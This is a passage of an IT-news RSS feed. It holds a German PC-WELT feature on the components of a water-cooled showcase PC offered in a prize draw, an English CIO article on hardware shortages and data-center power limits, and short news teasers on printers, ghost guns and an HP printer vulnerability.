<p>Sie können Ihre Daten aber auch mit dem Blu-Ray-Brenner Philips SPD7000BD speichern, der bei 2-fachem Schreibtempo knapp 9 MB/s über die SATA-Schnittstelle schaufelt und einen einlagigen 25-GB-BR-Rohling in gut 45 Minuten füllt. Das vom Online-Versender <a href="https://www.awin1.com/cread.php?awinaffid=486277&amp;awinmid=11731&amp;clickref=rss&amp;platform=dl&amp;ued=https://web.archive.org/web/20070315054615/http:/www.alternate.de/html/index.html">Alternate</a> zur Verfügung gestellte interne Laufwerk beschreibt aber auch CDs und DVDs. Der Pufferspeicher des SATA-Brenners beträgt 8 MB.</p>



<p>DVDs sowie CDs liest der Blu-Ray-Brenner mit maximal 16- beziehungsweise 32-facher Geschwindigkeit. DVD±Rs beschreibt das Laufwerk mit 12-fachem, DVD-RWs mit 8fachem und DVD+RWs mit 12-fachem Tempo. Dual-Layer-DVD‑Rs und Double-Layer-DVD+Rs brennt das interne Laufwerk mit 4-facher Geschwindigkeit. CD-Rs sowie CD-RWs beschreibt der Blu-Ray-Brenner mit 32‑fachem respektive 24‑fachem Tempo.</p>



<p>Im Lieferumfang des Blu-Ray-Laufwerks enthalten ist die Brenn-Software Nero 7 Essentials, eine abgespeckte Version von Nero 7 Premium mit folgenden, zum Teil funktionsreduzierten Programm-Modulen: Cover Designer 2, Express 7, Home, Incd 5, Media Home, Photoshow Express 4, Photosnap, Photosnap Viewer, Scout, Showtime 2, Start Smart 3, Toolkit sowie Vision 4. Von Cyberlink liegt ein Blu-Ray-Medium bei, auf dem sich das Abspielprogramm Power DVD BD befindet, mit dem Sie Filme auf Blu-Ray- und DVD-Medien abspielen können.</p>



<p>Beim zweiten optischen Laufwerk, dem Samsung SH-S182A, handelt es sich um einen Multiformat-DVD-Brenner, der auch das DVD-RAM-Format beherrscht. Außerdem unterstützt das SATA-Laufwerk die Lightscribe-Technik. Das interne Laufwerk beschreibt DVD±Rs mit 18-fachem, DVD-RWs mit 6fachem und DVD+RWs mit 8fachem Tempo. Dual-Layer-DVD‑Rs sowie Double-Layer-DVD+Rs brennt der Samsung SH-S182A mit 8-facher und DVD-RAMs mit 12-facher Geschwindigkeit.</p>



<h2 class="wp-block-heading toc">Bildschirme: 24-Zoll-TFT und 8-Zoll-Touchscreen</h2>



<p>Der integrierte 8-Zoll-LCD-Touchscreen Worcol VE-XVT-8, der auf ein Panasonic-Display setzt, ist normalerweise für den Einsatz im Auto gedacht. Die physikalische Auflösung des LCDs beträgt 800 x 600 Bildpunkte, maximal ist eine Auflösung von 1024 x 768 Pixeln möglich. Die Ansteuerung des Touchscreen-Sensor-Panels erfolgt über die USB-Schnittstelle. Der Touchscreen-Treiber unterstützt alle gängigen Betriebssysteme.</p>



<p>Laut Hersteller liegt der maximale Blickwinkel des Worcol VE-XVT-8 bei 150 Grad. Die Leuchtstärke gibt Panasonic mit 500cd/m² an. Das Kontrastverhältnis beträgt nach Angaben des Herstellers 350:1. Neben der D-Sub-Schnittstelle steht auch ein AV-Videoeingang zur Verfügung. Alle wichtigen Einstellungen wie Bildposition, Farbtemperatur und -tiefe, Helligkeit und Kontrast lassen sich stufenlos über die Bedienelemente auf der Vorderseite einstellen.</p>



<p>Für mehr Übersicht sorgt das 24-Zoll-Breitbild-TFT <a href="https://web.archive.org/web/20070315055016/http:/www.benq.de/products/LCD/?product=636">Benq FP241W</a>, das wir der Höllenmaschine zur Seite stellen. Die physikalische Auflösung des LCD-Bildschirms beträgt 1920 x 1200 Bildpunkte – damit stellt der Monitor selbst das HD-Format 1080p nativ dar. Die Auflösung reicht aber auch, um zwei DIN-A4-Seiten nebeneinander auf den Schirm zu bringen.</p>



<p>Reich gesegnet ist der Benq FP241W mit Schnittstellen: Pflicht für ein HD-Gerät ist natürlich der HDMI-Eingang, hoch aufgelöste Bildsignale empfängt der 24-Zöller aber auch über die DVI-D-Schnittstelle. Hinzu gesellen sich ein D-Sub-, ein S-Video-, ein Komponenten- und ein USB-Eingang. Praktisch: Der LCD fungiert auch als USB-Hub und stellt drei Ausgänge zur Verfügung.</p>



<p>Der Benq FP241W misst 564 x 567 x 248 Millimeter und bringt 10,6 Kilogramm auf die Waage. Laut Hersteller beträgt der Energieverbrauch im Betrieb 95 Watt. Die Reaktionszeit des Displays gibt Benq mit 6 Millisekunden an (grau zu grau). Die Helligkeit liegt nach Herstellerangaben bei 500cd/m² und das Kontrastverhältnis bei 1000:1. Den horizontalen und vertikalen Blickwinkel gibt Benq mit jeweils 178 Grad an. Unsere Bildschirm-Experten prüfen den 24-Zöller gerade, sodass wir Ihnen in Kürze einen ausführlichen Test präsentieren können.</p>



<h2 class="wp-block-heading toc">Sound: EAX 5 und kabelloser 5.1-Raumklang</h2>



<p>Für die akustische Untermalung ist bei der Höllenmaschine die <a href="https://web.archive.org/web/20070315054259/http:/www.creative.com/products/product.asp?category=1&amp;subcategory=208&amp;product=14000">Creative Sound Blaster X-Fi Fatality FPS</a> zuständig. Der mit 51 Millionen Transistoren sehr komplexe Soundchip erreicht eine maximale Samplingfrequenz von 192 kHz. Der Wavetable-Synthesizer beherrscht 128 Stimmen, 128 Instrumente und 10 Drumsets. Außerdem unterstützt der X-Fi-Chip den Standard EAX Advanced HD 5 nativ und beschleunigt entsprechend optimierte Spiele. Den Test der Creative X-Fi Xtreme Music, die den baugleichen Soundchip nutzt, finden Sie <a href="https://web.archive.org/web/20070315054259/http:/www.pcwelt.de/tests/hardware-tests/soundkarten/56503/index.html">hier</a> – unser Audio-Experte vergab für den analogen und digitalen Klang jeweils die Note „sehr gut“.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e0b099b390"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/Creative-Sound-Blaster-X-Fi-Fatality-FPS.jpg?quality=50&amp;strip=all" alt="Creative Sound Blaster X-Fi Fatality FPS" class="wp-image-3182073" width="792" height="472" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Creative </p></div>



<p>Damit Sie auch unter Vista EAX in vollen Zügen genießen können – Microsoft hat bekanntlich beim neuen Betriebssystem das Hardware Abstraction Layer (HAL) für Directsound und Directsound 3D entfernt –, hat Creative das Alchemy-Projekt gestartet. Wir sind daher zuversichtlich, dass der Glückspilz, der die PC-WELT Höllenmaschine 2 gewinnt, zum Liefertermin nicht mehr auf EAX-Raumklang unter Vista verzichten muss.</p>



<p>Die beiliegende Break-out-Box erlaubt den Zugriff auf die wichtigsten Schnittstellen via Front-Panel. Es stehen jeweils ein koaxialer und ein optischer SPDIF-Ein- und -Ausgang, zwei Cinch-Buchsen für den AUX-Eingang, ein Mini-MIDI-Ein- und -Ausgang sowie eine Kopfhörerbuchse mit Lautstärkeregler und ein kombinierter analoger Line-/Mikrofon-Eingang bereit. Das Sound-Paket komplettiert eine Fernbedienung.</p>



<p>Ebenfalls von Creative stammt das THX-zertifizierte 5.1-Lautsprecher-Set <a href="https://web.archive.org/web/20070315054259/http:/www.creative.com/products/product.asp?category=4&amp;subcategory=25&amp;product=14661">Gigaworks Progamer G550W</a>. Das Boxenset mit Funkübertragung zu den hinteren Lautsprechern liefert 36 Watt <a href="https://web.archive.org/web/20070315054259/http:/de.wikipedia.org/wiki/RMS-Leistung">RMS</a> pro Kanal zu den Satelliten, die Subwoofer-Leistung gibt Creative mit 130 Watt RMS an. Im Transmitter der Gigaworks Progamer G550W sind die Regler für die Lautstärkeverteilung, Bass, Treble und Volume untergebracht, ergänzt von einer Kopfhörer-Buchse und einem AUX-Eingang. Ebenfalls im Lieferumfang: eine Fernbedienung.</p>



<h2 class="wp-block-heading toc">Stromversorgung: 1000 Watt</h2>



<p>Umweltpolitisch nicht ganz korrekt, aber bitter notwendig für eine stabile Stromversorgung der Hochleistungs-Komponenten: das 1000-Watt-Netzteil <a href="https://web.archive.org/web/20070315053922/http:/h1124473.serverkompetenz.net/index.php?id=55&amp;cat=2&amp;subcat=7&amp;product=157">Enermax Galaxy EGA1000EWL</a>. Der Kraftprotz mit einem Kampfgewicht von 5,6 Kilogramm glänzt laut Hersteller mit mehreren Weltneuheiten: Dazu gehören unter anderem fünf 12-Volt-Leitungen und die Möglichkeit, bis zu 24 Laufwerke gleichzeitig anschließen zu können. Außerdem rühmt sich das Netzteil, die erste Triple-Quad-Unterstützung zu bieten, weshalb wir es als adäquaten Stromlieferanten für die Höllenmaschine II ausgewählt haben.</p>



<p>Wenn Sie unseren Superrechner als Server einsetzen wollen, werden Sie sich nicht nur über die Alarmfunktionen freuen, die den Netzteil-Status überwachen, sondern auch über die RAM-Kabel für Speicherbestückungen ab 32 GB. Eine gute Idee von Enermax ist auch die komplette Trennung der Prozessor-Stromversorgung von den restlichen Versorgungsleitungen. Die Kühlung des 1000-Watt-Kraftprotzes übernimmt übrigens ein leise arbeitender Doppellüfter, bestehend aus einem 135- und einem 80-Millimeter-Rotor.</p>



<h2 class="wp-block-heading toc">Wassergekühlt: CPUs, GPUs und Festplatten</h2>



<p>Bei der recht hohen Leistungsaufnahme – die exakten Verbrauchswerte liefern wir noch nach – ist für den stabilen Betrieb der Höllenmaschine 2 eine effiziente Kühlung der hitzigsten Komponenten unverzichtbar. Diese Aufgabe übernimmt eine Wasserkühlung, die wir aus Komponenten des Kühlungsspezialisten <a href="https://web.archive.org/web/20070315054545/http:/www.innovatek.de/">Innovatek</a> zusammengestellt haben. Gesamtwert: 1950 Euro.</p>



<p>Beginnen wir mit dem Prozessorkühler X-Flow Xeon aus vernickeltem Kupfer, der eine Bauhöhe von lediglich 18 Millimetern hat. Da einige Kondensatoren in unmittelbarer Nachbarschaft der CPU-Sockel die passgenaue Montage verhinderten, war eine komplette Modifikation der X-Flows für die Höllenmaschine notwendig. Die VGA-Kühler Cool-Matic G80-GTX/GTS leiten nicht nur die Abwärme der GPUs ab, sondern kühlen auch den Grafikspeicher, den Bridge-Chip sowie den Spannungswandler. Um die Kühlleistung zu verbessern, integriert Innovatek in die Cool-Matic G80-GTX/GTS einen speziellen Kupferkern.</p>



<p>Alle acht Festplatten wandern in den HDM L-Pro Festplattenkühler aus Aluminium, der sich aus einem Innen- und einem Außenrahmen zusammensetzt. Dabei sind die beiden Rahmen voneinander entkoppelt – das reduziert die Geräuschentwicklung. Selbstredend ist die HDM L-Pro für Laufwerke mit bis zu 15.000 Umdrehungen pro Minute ausgelegt. Die Festplattenkühler lassen sich zudem problemlos mit einem Temperaturfühler aufrüsten.</p>



<h2 class="wp-block-heading toc">Kühlsystem mit Hamstertränke</h2>



<p>Für einen gleichmäßigen Strom der Kühlflüssigkeit sorgt die 12-Volt-Pumpe HPPS Plus. Das gemeinsam von Innovatek und Eheim entwickelte Modell kennt zwei Betriebszustände: Im fast geräuschlosen Silent-Modus, in dem wir die HPPS Plus betreiben, beträgt die maximale Pumpleistung 2,05 Meter. Per Lötbrücke lässt sich der Power-Modus aktivieren, die Pumpleistung steigt dann auf stattliche vier Meter. Ein Mikroprozessor regelt die Drehzahl der HPPS Plus dynamisch, sodass jederzeit eine optimale Förderleistung gesichert ist.</p>



<p>Hamstertränke: Die scherzhafte Bezeichnung stammt von einem Kollegen, der sich noch nicht mit den Finessen eines Wasserkühlsystems befasst hat, in dem kein Ausgleichsbehälter fehlen darf. Das von uns eingesetzte Modell Tank-O-Matic hat einen Durchmesser von 50 Millimetern, die Bauhöhe beträgt 280 Millimeter und das Fassungsvermögen 280 Milliliter.</p>



<p>Das zentrale Kühlsystem komplettiert der Blackice Triple Radiator. Seine drei 120-Millimeter-Lüfter leiten die Abwärme der Prozessoren, Grafikkarten und der acht Festplatten fast lautlos nach außen. Unser Casemodding-Experte „Fastbrain1“, der das exklusive Design-Gehäuse der Höllenmaschine 2 entworfen und gebaut hat, konnte nicht widerstehen und hat den Blackice mit stark reflektierendem Silberlack veredelt.</p>



<p>Kleinteile: Insgesamt fast fünf Meter des PVC-Spezialschlauchs von Innovatek sind in der Höllenmaschine 2 verbaut. Dazu gesellen sich – unter anderem – 28 1/8-Winkelverbinder und 8 gewinkelte 1/8-Einschraubverschraubungen. An kritischen Stellen verhindern diverse Knickschutzfedern, dass der Spezialschlauch abknickt und der Supergau einer Wasserkühlung eintritt: der Stau des Kühlmittelflusses. Nicht zu vergessen: Die Durchfluss-Messturbine Flowmeter PRO Rev 3.6, die das Durchflusstempo in Umdrehungen pro Minute an das Rechner-BIOS übermittelt. Zudem lässt sich die Durchflussgeschwindigkeit auch optisch mittels der integrierten blauen Indikator-LED kontrollieren.</p>



<h2 class="wp-block-heading toc">Gehäuse-Unikat: Casemod für 3600 Euro</h2>



<p>Für die Gestaltung des Gehäuses konnte die PC-WELT einen Spezialisten gewinnen: Heiko Polaczek, auch unter dem Alias „Fastbrain1“ bekannt, ist seit 14 Jahren eine feste Größe in der internationalen Casemoding-Szene. Der mehrfach für seine Gehäuse-Kunstwerke ausgezeichnete Modding-Profi verarbeitete für die Höllenmaschine 6,5 Quadratmeter Blech, 2,7 Meter Stahlrohr, 17 Meter Schweißdraht und zwei Liter blauen Porsche-Autolack. Letzteres lässt sich der schwäbische Sportwagenhersteller schon fast mit Gold aufwiegen: Der Liter kostet 450 Euro. Erwähnenswert sind an dieser Stelle noch die 27 laufenden Meter Schleifpapier und über den Daumen gepeilte 7,5 Kilogramm Spachtelmasse, die Fastbrain1 für das Gehäuse-Unikat verbrauchte.</p>



<p>Allein der Materialwert für den schmucken Casemod summiert sich auf knapp 3600 Euro, vom Arbeitsaufwand – circa 300 Stunden – ganz zu schweigen. Mehr Informationen und eine umfangreiche Bildgalerie mit den besten Werken von Heiko Polaczek finden Sie auf der Website. Wie Heiko Polaczek aus einem gähnend langweiligen Server-Tower unser exklusives Schmuckstück geformt hat, erfahren Sie in Kürze im Beitrag „Making of Höllenmaschine 2“.</p>



<h2 class="wp-block-heading toc">Peripherie: funktionell und elegant</h2>



<p>Das Beste ist gerade gut genug für unseren Superrechner – das gilt auch für die Eingabegeräte: Die drahtlose Bluetooth-Tastatur Logitech di Novo Edge besticht nicht nur durch ihr elegantes Design, sondern auch durch die hochwertige Verarbeitung. Über das integrierte Touchpad lassen sich Bildlauf-, Auswahl- und Zeigerfunktionen effizient nutzen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e0b099c259"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/Logitech-di-Novo-Edge.jpg?quality=50&amp;strip=all" alt="Logitech di Novo Edge" class="wp-image-3182077" width="1024" height="669" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Logitech </p></div>



<p>Dazu gesellt sich die Maus Logitech MX Revolution. Die ergonomisch geformte Funk-Maus setzt auf die präzise Laserabtastung und erlaubt laut Hersteller dank eines Tastenrads aus Leichtmetall besonders schnelle Bildläufe. Clevere Funktionen wie „One-Touch search“ und „Smartshift“ erleichtern die tägliche Arbeit.</p>



<p>Einer guten Tradition folgend verlosen wir – wie schon im letzten Jahr – den Porsche unter den PCs. Beteiligen Sie sich an unserer <a href="https://web.archive.org/web/20070315054320/http:/www.pcwelt.de/news/hardware/69505/index.html">Leserwahl</a> zum PCW3-Award: Wir suchen die beste Hard- und Software des Jahres 2006. Entscheiden Sie, welche Top-Produkte wir mit dem PCW3-Award auszeichnen. Sie nehmen dann automatisch an der Verlosung teil, bei der die Höllenmaschine als 1. Preis ausgesetzt ist. Oder Sie besuchen uns auf der <a href="https://web.archive.org/web/20070315054320/http:/files.messe.de/cmsdb/007/9036.swf">CeBIT 2007</a> (Halle 6, Stand C12), um den Super-PC in Aktion zu erleben. Dort haben Sie ebenfalls Gelegenheit, an der Verlosung teilzunehmen.<br>Garantieausschluss: Ansprüche gegen die IDG Magazine Media GmbH wegen Sach- und Rechtsmängeln an dem PC sowie dem TFT sind ausgeschlossen. Im Übrigen finden die für Schenkungen geltenden Vorschriften der §§ 521 bis 524 BGB Anwendung.</p>



<h2 class="wp-block-heading toc"> So gewinnen Sie die HMX 6</h2>



<p>Auch dieses Jahr verlosen wir die Höllenmaschine unter allen Teilnehmern</p>


<span class="cta_btn_heading cta_btn_heading_"></span><div class="cta wp-block wp-block-button cta__btn_"><a class="cta__btn" href="https://www.pcwelt.de/article/3179491/hmx-6-gewinnspiel.html" target="_blank" rel="nofollow" data-vars-link-position="CTA Button">Gewinnen Sie hier die HMX 6</a></div>


<h2 class="wp-block-heading toc">Wie Sie die HMX 6 verfolgen können</h2>



<p>In den kommenden Wochen folgen weitere Inhalte rund um die Höllenmaschine 6 auf <a href="https://www.youtube.com/playlist?list=PLVC_WMwVwvSiOOgt6D9mN4Ud71M_uLFsS">YouTube</a>, <a href="https://www.instagram.com/pcwelt/">Instagram</a>, <a href="https://www.tiktok.com/@pcwelt.de">TikTok</a>, <a href="https://www.facebook.com/pcwelt/reels/">Facebook </a>und natürlich auf <a href="https://www.pcwelt.de/hmx" target="_blank" rel="noreferrer noopener">pcwelt.de</a>. Wenn Sie nichts verpassen wollen, sollten Sie den kostenlosen <a href="https://www.pcwelt.de/newsletter-anmeldung" target="_blank" rel="noreferrer noopener">HMX-6-Newsletter abonnieren</a> – aber vergessen Sie nicht, die Anmeldung via E-Mail zu bestätigen.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Best Printer for Your Home or Office in 2026: Tested by Our Experts]]></title>
<description><![CDATA[Whether you use your printer for school, a small business or everyday household tasks like printing photos, we’ve identified the top options worth considering.]]></description>
<link>https://tsecurity.de/de/3652788/it-nachrichten/best-printer-for-your-home-or-office-in-2026-tested-by-our-experts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652788/it-nachrichten/best-printer-for-your-home-or-office-in-2026-tested-by-our-experts/</guid>
<pubDate>Tue, 07 Jul 2026 23:17:54 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Whether you use your printer for school, a small business or everyday household tasks like printing photos, we’ve identified the top options worth considering.]]></content:encoded>
</item>
<item>
<title><![CDATA[Preparing for infrastructure constraints, from memory shortages to power limits]]></title>
<description><![CDATA[Historically, infrastructure planning followed a predictable script. CIOs balanced budgets, refresh cycles and procurement approvals and when demand spiked, the solution was straightforward — find the funding and scale up. The only real constraint was budget.



Today, the biggest constraints are...]]></description>
<link>https://tsecurity.de/de/3651773/it-nachrichten/preparing-for-infrastructure-constraints-from-memory-shortages-to-power-limits/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651773/it-nachrichten/preparing-for-infrastructure-constraints-from-memory-shortages-to-power-limits/</guid>
<pubDate>Tue, 07 Jul 2026 16:04:24 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p><br>Historically, infrastructure planning followed a predictable script. CIOs balanced budgets, refresh cycles and procurement approvals and when demand spiked, the solution was straightforward — find the funding and scale up. The only real constraint was budget.</p>



<p>Today, the biggest constraints aren’t sitting in spreadsheets; they’re rooted in physical reality. High-bandwidth memory is in short supply. Key server components are harder to secure. Power availability is tightening and cooling capacity is becoming a seriously limiting factor. In many cases, the question is no longer “can we afford it?” but “can we get it at all?”</p>



<p>The surge in AI workloads and the relentless expansion of hyperscale data centers have accelerated this shift. Supply chains that once comfortably met enterprise demand are now stretched thin as hyperscalers vacuum up GPUs, memory and large amounts of energy capacity. What used to be a stable, predictable ecosystem has become challenging territory.</p>



<p>For CIOs, this is forcing a serious rethink. Procurement strategies can no longer assume availability. Refresh cycles are being reconsidered. Even long-held assumptions about where infrastructure should live are being questioned. Perhaps most critically, the constraint is no longer just financial. Increasingly, organizations with approved budgets still find themselves waiting, sometimes months longer than planned, for the infrastructure they need to move forward.</p>



<p>In this new environment, planning isn’t just about spending wisely. It’s about securing access in a world where supply is uncertain.</p>



<h2 class="wp-block-heading">The new infrastructure bottleneck</h2>



<p>Over the past year, much of the conversation has centred on GPU shortages driven by surging AI demand. But the pressure is no longer confined to accelerators; it is spreading across nearly every major infrastructure component. High-bandwidth memory, DIMMs, storage systems, power supplies and even motherboard components are all increasingly subject to allocation constraints. This isn’t creating a temporary imbalance; it’s causing a structural shift.</p>



<p>Previously, semiconductor manufacturers distributed production across a broad mix of markets, from consumer devices to enterprise systems and laptops. AI has disrupted that model. Manufacturing capacity is being pulled toward hyperscale and AI-driven deployments at an unprecedented rate, leaving enterprise buyers competing for a shrinking pool of available supply. For CIOs, the consequences are becoming hard to ignore.</p>



<p>Many organizations are now seeing server costs rise far beyond initial forecasts. While OEM list prices have increased by around <a href="https://www.techradar.com/pro/the-bad-news-continues-server-prices-set-to-rise-in-latest-blow-to-hardware-budget" rel="nofollow">15% to 20%</a>, sharp price spikes in memory and other critical components, in some cases exceeding <a href="https://www.trendforce.com/presscenter/news/20260331-12995.html" rel="nofollow">50%</a>, are pushing total system costs significantly higher.</p>



<p>Lead times that once stretched a few weeks are now measured in months and in some cases, <a href="https://www.trendforce.com/presscenter/news/20260415-13013.html" rel="nofollow">close to a year</a>. Even the procurement process itself is under strain, with suppliers reportedly holding quotes for as little as 72 hours as they grapple with volatile pricing and uncertain availability. For enterprises used to multi-week internal approval cycles, this creates a new kind of operational friction.</p>



<p>And the disruption doesn’t stop in the data center. As high-performance memory is prioritised for AI workloads, pricing pressure is beginning to ripple into laptops and endpoint devices. Some organizations are revisiting older technologies such as tape backups to bridge capacity gaps while waiting for delayed infrastructure. The result is unexpected strain in markets that were, until recently, stable and predictable.</p>



<p>This leaves many CIOs balancing difficult trade-offs. With fixed budgets, some organizations are simply buying less than planned. Others are delaying projects altogether, waiting for supply to catch up. In response, infrastructure lifecycle strategies are shifting.</p>



<p>Systems that were once refreshed every three to five years are being kept in service for five years or more, with some organizations extending lifecycles to <a href="https://www.investing.com/news/stock-market-news/meta-extends-server-lifespan-amid-memory-chip-shortage--wsj-93CH-4646634?utm_source=chatgpt.com" rel="nofollow">six or even seven years</a> as cost pressures and supply constraints reshape infrastructure strategies. As a result, third-party maintenance providers and pre-owned hardware markets are playing a bigger role, offering a way to extend the life of existing assets while reducing exposure to procurement delays.</p>



<p>In many respects, sustainability goals and operational necessity are beginning to align. Extending infrastructure lifecycles can reduce electronic waste and capital expenditure but it also requires new approaches to maintenance, reliability and performance management. What was once a straightforward refresh decision is now a far more strategic calculation.</p>



<h2 class="wp-block-heading">The physics problem — power, cooling and data center limits</h2>



<p>Supply chain disruption is only part of the challenge. Beneath it lies an even more fundamental constraint — physics.</p>



<p>Modern AI systems require dramatically higher compute density than traditional enterprise workloads. This creates a corresponding increase in power consumption and thermal output, fundamentally changing the design of the modern data center. For decades, many enterprise environments were designed around racks consuming roughly 3kW per cabinet. Today, 50kW racks are becoming increasingly common in AI and high-performance computing environments. Some next-generation GPU deployments are already pushing toward 150kW per rack. That shift changes everything.</p>



<p>Cooling infrastructure designed for traditional enterprise environments is often incapable of handling these thermal loads. As a result, liquid cooling, once considered highly specialised, is rapidly becoming a necessity for many high-density deployments. But cooling is only one part of the equation. The larger issue is power availability itself.</p>



<p>In many regions, hyperscalers have already secured large portions of future energy capacity to support AI expansion. This is creating downstream constraints not only for enterprise data centers but for broader regional infrastructure planning. Utility providers in some markets are quoting <a href="https://money.usnews.com/investing/news/articles/2026-02-03/power-grid-delays-challenge-amazons-data-center-expansion-in-europe" rel="nofollow">five-</a> to seven-year timelines for major power upgrades, meaning organizations can no longer assume they can simply request additional megawatts when needed.</p>



<p>As a result, location strategy is changing. Historically, data center placement often prioritised connectivity, climate and real estate economics, but now, the deciding factor is often simply whether power is available. This shift is driving infrastructure expansion into regions that were not previously considered major data center hubs.</p>



<p>Water availability is emerging as another critical issue. Many advanced cooling systems require significant water resources, creating tension between data center growth and sustainability concerns. In some cases, local governments are already scrutinising or limiting expansion because of environmental impact. These dynamics are exposing limitations in how the industry measures efficiency.</p>



<p>Power Usage Effectiveness (PUE) remains one of the most widely used metrics for evaluating data center performance, but it does not always capture overall compute efficiency. A facility may improve its PUE score by operating at higher temperatures, for example, while simultaneously reducing server performance through thermal throttling.</p>



<p>That raises a contentious question for CIOs and infrastructure leaders — should efficiency be measured purely by power consumption, or by the amount of productive compute delivered per watt? As AI workloads scale, that distinction will become increasingly important.</p>



<h2 class="wp-block-heading">How CIOs should respond to long-term infrastructure constraints</h2>



<p>The most important takeaway for enterprise leaders is that these constraints are unlikely to disappear any time soon. Current market conditions suggest that supply pressure, power limitations and infrastructure volatility could continue well into <a href="https://www.cio.com/article/4137534/when-hardware-gets-scarce-endpoint-strategy-becomes-a-boardroom-priority.html">2027</a>. This means CIOs need to shift from short-term mitigation towards long-term resilience planning.</p>



<p>That starts with reassessing infrastructure lifecycle assumptions. Extending hardware longevity will become increasingly common, but doing so successfully requires stronger maintenance strategies, better monitoring and more disciplined asset management. Organizations may also need to diversify sourcing models, incorporating refurbished systems, third-party support and hybrid deployment strategies to reduce dependence on constrained supply chains. Capacity planning must also become more dynamic. Traditional procurement cycles based on predictable refresh schedules may no longer be sufficient in an environment defined by fluctuating availability and pricing.</p>



<p>CIOs will need to collaborate more closely with facilities, operations and sustainability teams. Infrastructure decisions can no longer be isolated within IT departments when power, cooling and water availability directly affect deployment feasibility. Most importantly, organizations may need to rethink what infrastructure optimization means.</p>



<p>For years, the industry prioritised maximum performance and rapid refresh cycles. The next phase will require balancing performance against availability, efficiency and long-term sustainability.</p>



<p>The AI era is introducing extraordinary opportunities for innovation, but it is also exposing the physical limits of the infrastructure ecosystem supporting it. The organizations that adapt most effectively will be those that recognise infrastructure resilience is no longer just a procurement issue; it is a strategic operational capability.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Are you ready for what it takes to stop ghost guns?]]></title>
<description><![CDATA[In the summer of 2024, former Army National Guard member Andrew Scott Hastings spent a sweaty afternoon carefully packing boxes with parts he made using his 3D printer. These weren't novelty figurines or replacement Ikea pieces. The boxes were instead filled with a handful of homemade firearm low...]]></description>
<link>https://tsecurity.de/de/3651320/it-nachrichten/are-you-ready-for-what-it-takes-to-stop-ghost-guns/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651320/it-nachrichten/are-you-ready-for-what-it-takes-to-stop-ghost-guns/</guid>
<pubDate>Tue, 07 Jul 2026 13:18:35 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[In the summer of 2024, former Army National Guard member Andrew Scott Hastings spent a sweaty afternoon carefully packing boxes with parts he made using his 3D printer. These weren't novelty figurines or replacement Ikea pieces. The boxes were instead filled with a handful of homemade firearm lower receivers and more than 100 "switches," small […]]]></content:encoded>
</item>
<item>
<title><![CDATA[HP DeskJet 2800 printer zero-day flaw leaks Wi-Fi credentials]]></title>
<description><![CDATA[HP DeskJet 2800 series printers are affected by a newly disclosed vulnerability that allows anyone on the same network to access sensitive configuration data without authentication. The flaw, tracked as CVE-2026-13753, affects devices running firmware version TBP1CN2612AR or earlier, and no secur...]]></description>
<link>https://tsecurity.de/de/3651170/it-security-nachrichten/hp-deskjet-2800-printer-zero-day-flaw-leaks-wi-fi-credentials/</link>
